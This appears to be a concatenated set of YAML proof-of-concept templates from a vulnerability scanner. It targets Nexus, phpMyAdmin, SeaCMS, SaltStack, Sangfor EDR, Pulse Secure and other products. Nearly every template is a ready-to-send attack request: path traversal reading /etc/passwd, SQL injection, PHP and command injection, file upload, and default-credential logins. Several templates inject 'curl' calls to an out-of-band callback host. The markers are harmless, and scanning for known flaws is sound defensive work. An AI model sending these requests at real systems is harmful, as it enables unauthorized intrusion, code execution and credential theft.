/pkg/pocs/nexus-cve-2020-10204.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nexus-cve-2020-10204 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: POST 7 | path: "/extdirect" 8 | headers: 9 | Content-Type: application/json 10 | body: | 11 | {"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{{{r1}}*{{r2}}}"]}],"type":"rpc","tid":28} 12 | expression: | 13 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 14 | detail: 15 | Affected Version: "nexus<3.21.2" 16 | author: kingkk(https://www.kingkk.com/) 17 | links: 18 | - https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb 19 | - https://www.cnblogs.com/magic-zero/p/12641068.html 20 | - https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31 21 | -------------------------------------------------------------------------------- /pkg/pocs/nexus-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nexus-default-password 2 | rules: 3 | - method: GET 4 | path: /nexus/service/siesta/capabilities 5 | expression: > 6 | response.status == 401 7 | - method: GET 8 | path: /nexus/service/local/authentication/login 9 | headers: 10 | Accept: application/json 11 | Authorization: Basic YWRtaW46YWRtaW4xMjM= 12 | expression: > 13 | response.status == 200 14 | - method: GET 15 | path: /nexus/service/siesta/capabilities 16 | expression: > 17 | response.status == 200 18 | detail: 19 | author: Soveless(https://github.com/Soveless) 20 | Affected Version: "Nexus Repository Manager OSS" 21 | links: 22 | - https://help.sonatype.com/learning/repository-manager-3/first-time-installation-and-setup/lesson-1%3A--installing-and-starting-nexus-repository-manager -------------------------------------------------------------------------------- /pkg/pocs/nexusdb-cve-2020-24571-path-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nexusdb-cve-2020-24571-path-traversal 2 | rules: 3 | - method: GET 4 | path: /../../../../../../../../windows/win.ini 5 | follow_redirects: true 6 | expression: > 7 | response.status == 200 && response.body.bcontains(bytes("[extensions]")) && response.content_type.contains("application/octet-stream") 8 | detail: 9 | author: su(https://suzzz112113.github.io/#blog) 10 | links: 11 | - https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371 -------------------------------------------------------------------------------- /pkg/pocs/nhttpd-cve-2019-16278.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nhttpd-cve-2019-16278 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: "/.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0" 8 | body: | 9 | echo 10 | echo 11 | expr {{r1}} + {{r2}} 2>&1 12 | expression: > 13 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 14 | 15 | detail: 16 | author: Loneyer 17 | versions: <= 1.9.6 18 | links: 19 | - https://git.sp0re.sh/sp0re/Nhttpd-exploits 20 | -------------------------------------------------------------------------------- /pkg/pocs/nps-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nps-default-password 2 | rules: 3 | - method: POST 4 | path: /login/verify 5 | body: username=admin&password=123 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"login success") 9 | -------------------------------------------------------------------------------- /pkg/pocs/nsfocus-uts-password-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nsfocus-uts-password-leak 2 | rules: 3 | - method: GET 4 | path: /webapi/v1/system/accountmanage/account 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"account") && response.body.bcontains(b"password") 8 | detail: 9 | author: MrP01ntSun(https://github.com/MrPointSun) 10 | links: 11 | - https://blog.csdn.net/DFMASTER/article/details/108547352 12 | -------------------------------------------------------------------------------- /pkg/pocs/nuuo-file-inclusion.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nuuo-file-inclusion 2 | rules: 3 | - method: GET 4 | path: /css_parser.php?css=css_parser.php 5 | follow_redirects: false 6 | expression: response.status == 200 && response.headers["content-type"] == "text/css" && response.body.bcontains(b"$_GET['css']") 7 | detail: 8 | author: 2357000166(https://github.com/2357000166) 9 | links: 10 | - https://www.exploit-db.com/exploits/40211 -------------------------------------------------------------------------------- /pkg/pocs/openfire-cve-2019-18394-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-openfire-cve-2019-18394-ssrf 2 | rules: 3 | - method: GET 4 | path: /getFavicon?host=baidu.com/? 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.contains("image/x-icon") && response.body.bcontains(bytes("baidu.com")) 8 | detail: 9 | author: su(https://suzzz112113.github.io/#blog) 10 | links: 11 | - https://www.cnvd.org.cn/patchInfo/show/192993 12 | - https://www.cnblogs.com/potatsoSec/p/13437713.html 13 | -------------------------------------------------------------------------------- /pkg/pocs/pandorafms-cve-2019-20224-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-pandorafms-cve-2019-20224-rce 2 | set: 3 | reverse: newReverse() 4 | reverseURL: reverse.url 5 | rules: 6 | - method: POST 7 | path: >- 8 | /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 9 | headers: 10 | Content-Type: application/x-www-form-urlencoded 11 | body: >- 12 | date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{reverseURL}}+%23&draw_button=Draw 13 | follow_redirects: true 14 | expression: | 15 | response.status == 200 && reverse.wait(5) 16 | detail: 17 | author: JingLing(https://hackfun.org/) 18 | version: Pandora FMS v7.0NG 19 | links: 20 | - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ 21 | -------------------------------------------------------------------------------- /pkg/pocs/php-cgi-cve-2012-1823.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-php-cgi-cve-2012-1823 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: POST 6 | path: /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input 7 | body: 8 | follow_redirects: false 9 | expression: | 10 | response.body.bcontains(bytes(md5(string(rand)))) 11 | detail: 12 | author: 17bdw 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823 -------------------------------------------------------------------------------- /pkg/pocs/phpcms-cve-2018-19127.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpcms-cve-2018-19127 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /type.php?template=tag_(){}%3b@unlink(file)%3becho md5($_GET[1])%3b{//../rss 7 | follow_redirects: true 8 | expression: | 9 | response.status == 200 10 | - method: GET 11 | path: /data/cache_template/rss.tpl.php?1={{r}} 12 | follow_redirects: true 13 | expression: | 14 | response.body.bcontains(bytes(md5(string(r)))) 15 | 16 | detail: 17 | author: pa55w0rd(www.pa55w0rd.online/) 18 | Affected Version: "PHPCMS2008" 19 | links: 20 | - https://github.com/ab1gale/phpcms-2008-CVE-2018-19127 21 | -------------------------------------------------------------------------------- /pkg/pocs/phpmyadmin-cve-2018-12613-file-inclusion.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion 2 | rules: 3 | - method: GET 4 | path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 5 | follow_redirects: false 6 | expression: >- 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | detail: 9 | author: p0wd3r 10 | links: 11 | - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 12 | -------------------------------------------------------------------------------- /pkg/pocs/phpmyadmin-setup-deserialization.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpmyadmin-setup-deserialization 2 | rules: 3 | - method: POST 4 | path: /scripts/setup.php 5 | body: >- 6 | action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} 7 | follow_redirects: false 8 | expression: >- 9 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 10 | detail: 11 | author: p0wd3r 12 | links: 13 | - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 14 | -------------------------------------------------------------------------------- /pkg/pocs/phpok-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpok-sqli 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: "/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{r1}}))) --+" 7 | expression: | 8 | response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 9 | detail: 10 | author: jinqi 11 | links: 12 | - https://github.com/jinqi520 13 | -------------------------------------------------------------------------------- /pkg/pocs/phpshe-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpshe-sqli 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,CONCAT%28md5({{rand}})%29,4,5,6,7,8,9,10,11,12%23_ 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: hhdaddy 11 | Affected Version: "1.7" 12 | links: 13 | - https://www.cnblogs.com/Spec/p/10718046.html 14 | -------------------------------------------------------------------------------- /pkg/pocs/phpstudy-backdoor-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpstudy-backdoor-rce 2 | set: 3 | r: randomLowercase(6) 4 | payload: base64("printf(md5('" + r + "'));") 5 | rules: 6 | - method: GET 7 | path: /index.php 8 | headers: 9 | Accept-Encoding: 'gzip,deflate' 10 | Accept-Charset: '{{payload}}' 11 | follow_redirects: false 12 | expression: | 13 | response.body.bcontains(bytes(md5(r))) 14 | detail: 15 | author: 17bdw 16 | Affected Version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4" 17 | vuln_url: "php_xmlrpc.dll" 18 | links: 19 | - https://www.freebuf.com/column/214946.html -------------------------------------------------------------------------------- /pkg/pocs/phpunit-cve-2017-9841-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpunit-cve-2017-9841-rce 2 | set: 3 | rand: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 7 | body: 8 | follow_redirects: false 9 | expression: response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 10 | detail: 11 | author: p0wd3r,buchixifan 12 | links: 13 | - https://github.com/vulhub/vulhub/tree/master/phpunit/CVE-2017-9841 -------------------------------------------------------------------------------- /pkg/pocs/powercreator-arbitrary-file-upload.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-powercreator-arbitrary-file-upload 2 | set: 3 | rand: randomInt(1000, 9999) 4 | content: randomLowercase(8) 5 | randname: randomLowercase(4) 6 | rules: 7 | - method: POST 8 | path: /upload/UploadResourcePic.ashx?ResourceID={{rand}} 9 | follow_redirects: false 10 | headers: 11 | Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136 12 | Content-Disposition: form-data;name="file1";filename="{{randname}}.aspx"; 13 | body: "-----------------------------20873900192357278038549710136\nContent-Disposition: form-data; name=\"file1\"; filename=\"{{randname}}.aspx\"\nContent-Type: image/jpeg\n\n{{content}}\n-----------------------------20873900192357278038549710136--" 14 | search: | 15 | (?P.+?).ASPX 16 | expression: response.status == 200 && response.body.bcontains(b".ASPX") 17 | - method: GET 18 | path: /ResourcePic/{{path}}.ASPX 19 | follow_redirects: false 20 | expression: response.status == 200 21 | detail: 22 | author: MrP01ntSun(https://github.com/MrPointSun) 23 | links: 24 | - https://xz.aliyun.com/t/8478#reply-15684 25 | -------------------------------------------------------------------------------- /pkg/pocs/pulse-cve-2019-11510.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-pulse-cve-2019-11510 2 | rules: 3 | - method: GET 4 | path: >- 5 | /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 9 | detail: 10 | author: leezp 11 | Affected Version: "Pulse Connect Secure: 9.0RX 8.3RX 8.2RX" 12 | links: 13 | - https://github.com/jas502n/CVE-2019-11510-1 14 | - https://github.com/projectzeroindia/CVE-2019-11510 -------------------------------------------------------------------------------- /pkg/pocs/pyspider-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-pyspider-unauthorized-access 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: /debug/pyspidervulntest/run 8 | headers: 9 | Content-Type: application/x-www-form-urlencoded 10 | body: >- 11 | webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print(str({{r1}}+%2B+{{r2}}))&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D 12 | follow_redirects: true 13 | expression: > 14 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 15 | detail: 16 | author: we1x4n(https://we1x4n.github.io/) 17 | links: 18 | - https://github.com/ianxtianxt/Pyspider-webui-poc 19 | -------------------------------------------------------------------------------- /pkg/pocs/qibocms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-qibocms-sqli 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /f/job.php?job=getzone&typeid=zone&fup=..\..\do\js&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1&pre=qb_label%20where%20lid=-1%20UNION%20SELECT%201,2,3,4,5,6,0,md5({{rand}}),9,10,11,12,13,14,15,16,17,18,19%23 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: Rexus 11 | links: 12 | - https://www.ld-fcw.com/ 13 | -------------------------------------------------------------------------------- /pkg/pocs/qnap-cve-2019-7192.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-qnap-cve-2019-7192 2 | rules: 3 | - method: POST 4 | path: /photo/p/api/album.php 5 | headers: 6 | Content-Type: application/x-www-form-urlencoded 7 | body: a=setSlideshow&f=qsamplealbum 8 | expression: | 9 | response.status == 200 10 | search: >- 11 | (?P.*?) 12 | - method: GET 13 | path: /photo/slideshow.php?album={{album_id}} 14 | expression: | 15 | response.status == 200 16 | search: >- 17 | encodeURIComponent\(\'(?P.*?)\'\) 18 | - method: POST 19 | path: /photo/p/api/video.php 20 | headers: 21 | Content-Type: application/x-www-form-urlencoded 22 | body: album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=./../../../../../etc/passwd 23 | expression: | 24 | response.status == 200 && response.body.bcontains(b"admin:x:0:0") 25 | detail: 26 | author: Hzllaga 27 | links: 28 | - https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit 29 | -------------------------------------------------------------------------------- /pkg/pocs/rails-cve-2018-3760-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-rails-cve-2018-3760-rce 2 | rules: 3 | - method: GET 4 | path: '/assets/file:%2f%2f/etc/passwd' 5 | follow_redirects: false 6 | expression: | 7 | response.status == 500 && response.body.bcontains(b"FileOutsidePaths") 8 | search: '/etc/passwd is no longer under a load path: (?P.*?),' 9 | - method: GET 10 | path: >- 11 | /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd 12 | follow_redirects: false 13 | expression: | 14 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 15 | detail: 16 | author: leezp 17 | Affected Version: "Sprockets<=3.7.1" 18 | links: 19 | - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760 20 | -------------------------------------------------------------------------------- /pkg/pocs/razor-cve-2018-8770.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-razor-cve-2018-8770 2 | rules: 3 | - method: GET 4 | path: /tests/generate.php 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"Fatal error: Class 'PHPUnit_Framework_TestCase' not found in ") && response.body.bcontains(b"/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line") 8 | detail: 9 | author: we1x4n(https://we1x4n.github.io/) 10 | links: 11 | - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770 12 | - https://www.exploit-db.com/exploits/44495/ 13 | -------------------------------------------------------------------------------- /pkg/pocs/rconfig-cve-2019-16663.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-rconfig-cve-2019-16663 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | r1: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: GET 7 | path: /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bexpr%20{{r}}%20%2B%20{{r1}}%20%20%23 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(string(r + r1))) 10 | detail: 11 | author: 17bdw 12 | links: 13 | - https://github.com/rconfig/rconfig/commit/6ea92aa307e20f0918ebd18be9811e93048d5071 14 | - https://www.cnblogs.com/17bdw/p/11840588.html 15 | - https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ -------------------------------------------------------------------------------- /pkg/pocs/resin-cnnvd-200705-315.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-resin-cnnvd-200705-315 2 | rules: 3 | - method: GET 4 | path: /%20../web-inf/ 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"/ ../web-inf/") && response.body.bcontains(b"Directory of /") 8 | detail: 9 | author: whynot(https://github.com/notwhy) 10 | links: 11 | - https://www.secpulse.com/archives/39144.html 12 | - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315 -------------------------------------------------------------------------------- /pkg/pocs/resin-inputfile-fileread-or-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-resin-inputfile-fileread-or-ssrf 2 | rules: 3 | - method: GET 4 | path: /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(bytes("<%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %>")) 8 | detail: 9 | author: whynot(https://github.com/notwhy) 10 | links: 11 | - https://www.secpulse.com/archives/496.html -------------------------------------------------------------------------------- /pkg/pocs/resin-viewfile-fileread.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-resin-viewfile-fileread 2 | rules: 3 | - method: GET 4 | path: /resin-doc/viewfile/?file=index.jsp 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(bytes("%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %")) 8 | detail: 9 | author: whynot(https://github.com/notwhy) 10 | links: 11 | - https://www.cnvd.org.cn/flaw/show/CNVD-2006-3205 12 | - http://0day5.com/archives/1173/ -------------------------------------------------------------------------------- /pkg/pocs/ruijie-eg-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ruijie-eg-rce 2 | set: 3 | reverse: newReverse() 4 | reverseURL: reverse.url 5 | 6 | rules: 7 | - method: POST 8 | path: /guest_auth/guestIsUp.php 9 | body: mac=1&ip=127.0.0.1|curl+{{reverseURL}} 10 | expression: | 11 | reverse.wait(5) 12 | detail: 13 | author: pa55w0rd(www.pa55w0rd.online/) 14 | links: 15 | - https://github.com/Tas9er/EgGateWayGetShell 16 | - https://www.t00ls.net/thread-59334-1-1.html -------------------------------------------------------------------------------- /pkg/pocs/saltstack-cve-2020-16846.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-saltstack-cve-2020-16846 2 | set: 3 | reverse: newReverse() 4 | reverseURL: reverse.url 5 | 6 | rules: 7 | - method: POST 8 | path: /run 9 | body: token=12312&client=ssh&tgt=*&fun=a&roster=aaa&ssh_priv=aaa|curl+{{reverseURL}}%3b 10 | expression: | 11 | reverse.wait(5) 12 | 13 | detail: 14 | author: we1x4n(https://we1x4n.com/) 15 | links: 16 | - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag 17 | - https://github.com/vulhub/vulhub/blob/master/saltstack/CVE-2020-16846/README.zh-cn.md 18 | -------------------------------------------------------------------------------- /pkg/pocs/samsung-wea453e-default-pwd.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-samsung-wea453e-default-pwd 2 | rules: 3 | - method: POST 4 | path: /main.ehp 5 | follow_redirects: false 6 | body: | 7 | httpd;General;lang=en&login_id=root&login_pw=sweap12~ 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes("document.formParent2.changepasswd1.value")) && response.body.bcontains(bytes("passwd_change.ehp")) 10 | detail: 11 | author: sharecast 12 | links: 13 | - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ 14 | -------------------------------------------------------------------------------- /pkg/pocs/samsung-wea453e-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-samsung-wea453e-rce 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(1140000, 1144800) 5 | rules: 6 | - method: POST 7 | path: /(download)/tmp/1.txt 8 | follow_redirects: false 9 | body: | 10 | command1=shell%3Aexpr {{r1}} - {{r2}}|dd of=/tmp/1.txt 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(string(r1 - r2))) 13 | detail: 14 | author: sharecast 15 | links: 16 | - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ 17 | -------------------------------------------------------------------------------- /pkg/pocs/sangfor-edr-arbitrary-admin-login.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-edr-arbitrary-admin-login 2 | rules: 3 | - method: GET 4 | path: /ui/login.php?user=admin 5 | follow_redirects: false 6 | expression: > 7 | response.status == 302 && 8 | response.body.bcontains(b"/download/edr_installer_") && 9 | response.headers["Set-Cookie"] != "" 10 | detail: 11 | author: hilson 12 | links: 13 | - https://mp.weixin.qq.com/s/6aUrXcnab_EScoc0-6OKfA 14 | -------------------------------------------------------------------------------- /pkg/pocs/sangfor-edr-cssp-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-edr-cssp-rce 2 | rules: 3 | - method: POST 4 | path: /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 5 | headers: 6 | Content-Type: application/x-www-form-urlencoded 7 | body: >- 8 | {"params":"w=123\"'1234123'\"|id"} 9 | expression: > 10 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"uid=0(root)") 11 | detail: 12 | author: x1n9Qi8 13 | Affected Version: "Sangfor EDR 3.2.17R1/3.2.21" 14 | links: 15 | - https://www.cnblogs.com/0day-li/p/13650452.html 16 | -------------------------------------------------------------------------------- /pkg/pocs/sangfor-edr-tool-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-edr-tool-rce 2 | set: 3 | r1: randomLowercase(8) 4 | r2: randomLowercase(8) 5 | rules: 6 | - method: GET 7 | path: "/tool/log/c.php?strip_slashes=printf&host={{r1}}%25%25{{r2}}" 8 | follow_redirects: false 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(r1 + "%" + r2)) 11 | detail: 12 | author: cookie 13 | links: 14 | - https://edr.sangfor.com.cn/ 15 | -------------------------------------------------------------------------------- /pkg/pocs/satellian-cve-2020-7980-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-satellian-cve-2020-7980-rce 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: >- 8 | /cgi-bin/libagent.cgi?type=J 9 | headers: 10 | Cookie: ctr_t=0; sid=123456789 11 | Content-Type: application/json 12 | body: >- 13 | {"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "expr {{r1}} + {{r2}}", "F": "EXEC_CMD"}, "V_": 1} 14 | follow_redirects: true 15 | expression: response.body.bcontains(bytes(string(r1 + r2))) 16 | detail: 17 | author: JingLing(https://hackfun.org/) 18 | Affected version: Intellian Aptus Web <= 1.24 19 | links: 20 | - https://nvd.nist.gov/vuln/detail/CVE-2020-7980 21 | -------------------------------------------------------------------------------- /pkg/pocs/seacms-before-v992-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacms-before-v992-rce 2 | set: 3 | r1: randomLowercase(8) 4 | rules: 5 | - method: GET 6 | path: "/comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[_])%3B%3F%3E" 7 | expression: | 8 | response.status == 200 9 | - method: GET 10 | path: "/data/mysqli_error_trace.php?_=printf(md5(\"{{r1}}\"))%3B" 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(md5(r1))) 13 | detail: 14 | author: bufsnake(https://github.com/bufsnake) 15 | links: 16 | - https://www.zhihuifly.com/t/topic/3118 17 | -------------------------------------------------------------------------------- /pkg/pocs/seacms-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacms-rce 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | r1: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: "/search.php?print({{r}}%2b{{r1}})" 8 | headers: 9 | Content-Type: application/x-www-form-urlencoded 10 | body: | 11 | searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/* 12 | expression: | 13 | response.status == 200 && response.body.bcontains(bytes(string(r + r1))) 14 | detail: 15 | author: neverendxxxxxx(https://github.com/neverendxxxxxx),violin 16 | seacms: v6.55 17 | links: 18 | - https://www.jianshu.com/p/8d878330a42f 19 | -------------------------------------------------------------------------------- /pkg/pocs/seacms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacms-sqli 2 | rules: 3 | - method: GET 4 | path: /comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27` 5 | follow_redirects: true 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"6f7c6dcbc380aac3bcba1f9fccec99") 8 | detail: 9 | author: MaxSecurity(https://github.com/MaxSecurity) 10 | links: 11 | - https://www.uedbox.com/post/54561/ 12 | -------------------------------------------------------------------------------- /pkg/pocs/seacms-v654-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacms-v654-rce 2 | set: 3 | rand: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: /search.php 7 | body: >- 8 | searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=prin&9[]=tf(md5({{rand}})); 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 12 | detail: 13 | links: 14 | - http://0day5.com/archives/4249/ 15 | - https://phyb0x.github.io/2018/10/09/seacms%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%86%E6%9E%90/ -------------------------------------------------------------------------------- /pkg/pocs/seacmsv645-command-exec.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seacmsv645-command-exec 2 | set: 3 | rand1: randomInt(200000000, 210000000) 4 | rand2: randomInt(200000000, 210000000) 5 | rules: 6 | - method: POST 7 | path: /search.php?searchtype=5 8 | body: searchtype=5&order=}{end if} {if:1)print({{rand1}}%2b{{rand2}});if(1}{end if} 9 | expression: | 10 | response.body.bcontains(bytes(string(rand1 + rand2))) 11 | detail: 12 | author: Facker007(https://github.com/Facker007) 13 | links: 14 | - https://www.cnblogs.com/ffx1/p/12653597.html 15 | -------------------------------------------------------------------------------- /pkg/pocs/seeyon-ajax-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-seeyon-ajax-unauthorized-access 2 | rules: 3 | - method: GET 4 | path: /seeyon/thirdpartyController.do.css/..;/ajax.do 5 | expression: | 6 | response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null")) 7 | - method: GET 8 | path: /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes("MMOneProfile")) && response.body.bcontains(bytes("productTags")) && response.body.bcontains(bytes("serverIdentifier")) && response.content_type.contains("application/json") 11 | 12 | detail: 13 | author: x1n9Qi8 14 | links: 15 | - https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA 16 | - https://buaq.net/go-53721.html 17 | -------------------------------------------------------------------------------- /pkg/pocs/seeyon-cnvd-2020-62422-readfile.yml: -------------------------------------------------------------------------------- 